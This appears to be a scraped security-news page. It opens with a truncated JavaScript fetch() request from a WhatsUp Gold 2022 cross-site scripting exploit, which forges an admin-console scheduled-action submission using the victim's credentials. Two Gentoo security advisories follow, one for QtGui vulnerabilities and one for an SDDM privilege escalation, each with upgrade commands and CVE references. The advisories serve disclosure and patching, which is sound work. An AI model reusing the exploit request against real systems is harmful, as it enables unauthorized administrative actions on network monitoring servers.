Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

Gentoo Linux Security Advisory 202402-3 - Multiple vulnerabilities have been discovered in QtGui which can lead to remote code execution. Versions greater than or equal to 5.15.9-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: QtGui: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #808531, #907119  
       ID: 202402-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in QtGui which can lead to  
remote code execution.

Background  
==========

QtGui is a module for the Qt toolkit.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
dev-qt/qtgui  < 5.15.9-r1   >= 5.15.9-r1

Description  
===========

Multiple vulnerabilities have been discovered in QtGui. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All QtGui users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-qt/qtgui-5.15.9-r1"

References  
==========

[ 1 ] CVE-2021-38593  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38593  
[ 2 ] CVE-2023-32763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32763

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-03

Gentoo Linux Security Advisory 202402-2 - A vulnerability has been discovered in SDDM which can lead to privilege escalation. Versions greater than or equal to 0.18.1-r6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: SDDM: Privilege Escalation  
     Date: February 03, 2024  
     Bugs: #753104  
       ID: 202402-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in SDDM which can lead to privilege  
escalation.

Background  
==========

SDDM is a modern display manager for X11 and Wayland sessions aiming to  
be fast, simple and beautiful. It uses modern technologies like QtQuick,  
which in turn gives the designer the ability to create smooth, animated  
user interfaces.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
x11-misc/sddm  < 0.18.1-r6   >= 0.18.1-r6

Description  
===========

A vulnerability has been discovered in SDDM. Please review the CVE  
identifier referenced below for details.

Impact  
======

SDDM passes the -auth and -displayfd command line arguments when  
starting the Xserver. It then waits for the display number to be  
received from the Xserver via the `displayfd`, before the Xauthority  
file specified via the `-auth` parameter is actually written. This  
results in a race condition, creating a time window in which no valid  
Xauthority file is existing while the Xserver is already running.

The X.Org server, when encountering a non-existing, empty or  
corrupt/incomplete Xauthority file, will grant any connecting client  
access to the Xorg display. A local unprivileged attacker can thus  
create an unauthorized connection to the Xserver and grab e.g. keyboard  
input events from other legitimate users accessing the Xserver.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SDDM users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-misc/sddm-0.18.1-r6"

References  
==========

[ 1 ] CVE-2020-28049  
      https://nvd.nist.gov/vuln/detail/CVE-2020-28049

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#mac